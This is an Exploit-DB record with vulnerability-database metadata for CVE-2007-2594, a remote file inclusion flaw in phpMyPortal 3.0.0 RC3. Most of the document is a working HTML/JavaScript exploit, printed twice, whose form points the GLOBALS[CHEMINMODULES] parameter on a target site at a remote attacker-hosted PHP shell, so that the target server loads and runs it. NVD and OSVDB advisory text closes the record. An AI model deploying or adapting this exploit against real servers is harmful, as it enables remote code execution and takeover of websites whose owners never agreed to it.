ID EDB-ID:3879
Type exploitdb
Reporter GoLd_M
Modified 2007-05-09T00:00:00
Description
phpMyPortal 3.0.0 RC3 GLOBALS[CHEMINMODULES] RFI Exploit. CVE-2007-2594. Webapps exploit for php platform
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>phpMyPortal 3.0.0 RC3(GLOBALS[CHEMINMODULES])Remote File Include Exploit</title>
<script language="JavaScript">
//'===============================================================================================
//'[Script Name: phpMyPortal (22 acc.s) (Version 3.0.0 RC3 du 05/05/2007)
//'[Ex : [Path_Script]/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=Shell
//'[Author : Mahmood_ali
//'[S.Page : http://phpmyportal.info/menu.php <= Click T.l.chargez phpMyPortal
//'[$$ : Free
//'===============================================================================================
//'[[V.Code]]------------------------------------------------------
//'
//'require_once($GLOBALS['CHEMINMODULES'].'/forum/inc/nouvelle.inc.php');
//'
//'[[V.Code]]---------------------------------------------------------
//# Tryag.Com
//# ...
//Basic exploit,but any time : (
var path="/inc/"
var adres="/articles.inc.php?" //File name
var acik ="GLOBALS[CHEMINMODULES]=" // Line 67
var shell="http://www.spy-art.com/xx.txt?" // Shell Tryag-Team
function command(){
if (document.rfi.target1.value==""){
alert("Failed..");
return false;
}
rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready
rfi.submit(); // Form Submit
}
</script>
</head>
<body bgcolor="#000000">
<center>
<p><b><font face="Arial" size="2" color="#FFFFFF">phpMyPortal 3.0.0
RC3(GLOBALS[CHEMINMODULES])Remote File Include Exploit</font></b></p>
<p></p>
<form method="post" target="getting" name="rfi" onSubmit="command();">
<b><font face="Tahoma" size="1" color="#FF0000">Target:</font><font face="Tahoma" size="1" color="#FFFF00">[http://[target]/[scriptpath]</font><font color="#00FF00" size="2" face="Tahoma">
</font><font color="#FF0000" size="2"> </font></b>
<input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p>
<p><input type="submit" value="Gonder" name="B1"><input type="reset" value="Sifirla" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe>
</p>
<b><font face="Lucida Handwriting" size="5" color="#FF0000">Mahmood_ali</font></b><p>
<b><a href="http://tryag.com/cc">
<font face="Lucida Handwriting" size="5" color="#FFFFFF">Tryag.-Team</font></a></b></p>
</p>
</center>
</body>
</html>
# milw0rm.com [2007-05-09]
{"id": "EDB-ID:3879", "hash": "2f912aab0fea2fb9469998701a8fabf2", "type": "exploitdb", "bulletinFamily": "exploit", "title": "phpMyPortal 3.0.0 RC3 - GLOBALSCHEMINMODULES RFI Exploit", "description": "phpMyPortal 3.0.0 RC3 GLOBALS[CHEMINMODULES] RFI Exploit. CVE-2007-2594. Webapps exploit for php platform", "published": "2007-05-09T00:00:00", "modified": "2007-05-09T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/3879/", "reporter": "GoLd_M", "references": [], "cvelist": ["CVE-2007-2594"], "lastseen": "2016-01-31T19:31:06", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2594"]}, {"type": "osvdb", "idList": ["OSVDB:35908"]}], "modified": "2016-01-31T19:31:06"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/3879/", "sourceData": "<html>\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1254\">\n<title>phpMyPortal 3.0.0 RC3(GLOBALS[CHEMINMODULES])Remote File Include Exploit</title>\n\n<script language=\"JavaScript\">\n \n//'===============================================================================================\n//'[Script Name: phpMyPortal (22 acc.s) (Version 3.0.0 RC3 du 05/05/2007)\n//'[Ex : [Path_Script]/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=Shell\n//'[Author : Mahmood_ali\n//'[S.Page : http://phpmyportal.info/menu.php <= Click T.l.chargez phpMyPortal\n//'[$$ : Free\n//'===============================================================================================\n\n//'[[V.Code]]------------------------------------------------------\n//'\n//'require_once($GLOBALS['CHEMINMODULES'].'/forum/inc/nouvelle.inc.php');\n//'\n//'[[V.Code]]---------------------------------------------------------\n\n//# Tryag.Com\n//# ...\n\n \n\n //Basic exploit,but any time : ( \n var path=\"/inc/\"\n var adres=\"/articles.inc.php?\" //File name\n var acik =\"GLOBALS[CHEMINMODULES]=\" // Line 67\n var shell=\"http://www.spy-art.com/xx.txt?\" // Shell Tryag-Team\n \n function command(){\n if (document.rfi.target1.value==\"\"){\n alert(\"Failed..\");\n return false;\n }\n\n\n \n rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready \n rfi.submit(); // Form Submit\n }\n</script>\n\n</head>\n\n<body bgcolor=\"#000000\">\n<center>\n\n<p><b><font face=\"Arial\" size=\"2\" color=\"#FFFFFF\">phpMyPortal 3.0.0 \nRC3(GLOBALS[CHEMINMODULES])Remote File Include Exploit</font></b></p>\n\n<p></p>\n<form method=\"post\" target=\"getting\" name=\"rfi\" onSubmit=\"command();\">\n <b><font face=\"Tahoma\" size=\"1\" color=\"#FF0000\">Target:</font><font face=\"Tahoma\" size=\"1\" color=\"#FFFF00\">[http://[target]/[scriptpath]</font><font color=\"#00FF00\" size=\"2\" face=\"Tahoma\">\n </font><font color=\"#FF0000\" size=\"2\"> </font></b>\n <input type=\"text\" name=\"target1\" size=\"20\" style=\"background-color: #808000\" onmouseover=\"javascript:this.style.background='#808080';\" onmouseout=\"javascript:this.style.background='#808000';\"></p>\n <p><input type=\"submit\" value=\"Gonder\" name=\"B1\"><input type=\"reset\" value=\"Sifirla\" name=\"B2\"></p>\n</form>\n<p><br>\n<iframe name=\"getting\" height=\"337\" width=\"633\" scrolling=\"yes\" frameborder=\"0\"></iframe>\n</p>\n\n<b><font face=\"Lucida Handwriting\" size=\"5\" color=\"#FF0000\">Mahmood_ali</font></b><p>\n<b><a href=\"http://tryag.com/cc\">\n<font face=\"Lucida Handwriting\" size=\"5\" color=\"#FFFFFF\">Tryag.-Team</font></a></b></p>\n</p>\n</center>\n</body>\n\n</html>\n\n# milw0rm.com [2007-05-09]\n", "osvdbidlist": ["35908"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-10-11T11:07:09", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in inc/articles.inc.php in phpMyPortal 3.0.0 RC3 allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[CHEMINMODULES] parameter.", "modified": "2017-10-10T21:32:17", "published": "2007-05-11T06:19:00", "id": "CVE-2007-2594", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2594", "title": "CVE-2007-2594", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## References:\n[Secunia Advisory ID:25210](https://secuniaresearch.flexerasoftware.com/advisories/25210/)\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3879\nFrSIRT Advisory: ADV-2007-1738\n[CVE-2007-2594](https://vulners.com/cve/CVE-2007-2594)\nBugtraq ID: 23898\n", "modified": "2007-05-09T08:29:04", "published": "2007-05-09T08:29:04", "href": "https://vulners.com/osvdb/OSVDB:35908", "id": "OSVDB:35908", "title": "phpMyPortal inc/articles.inc.php GLOBALS[CHEMINMODULES] Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
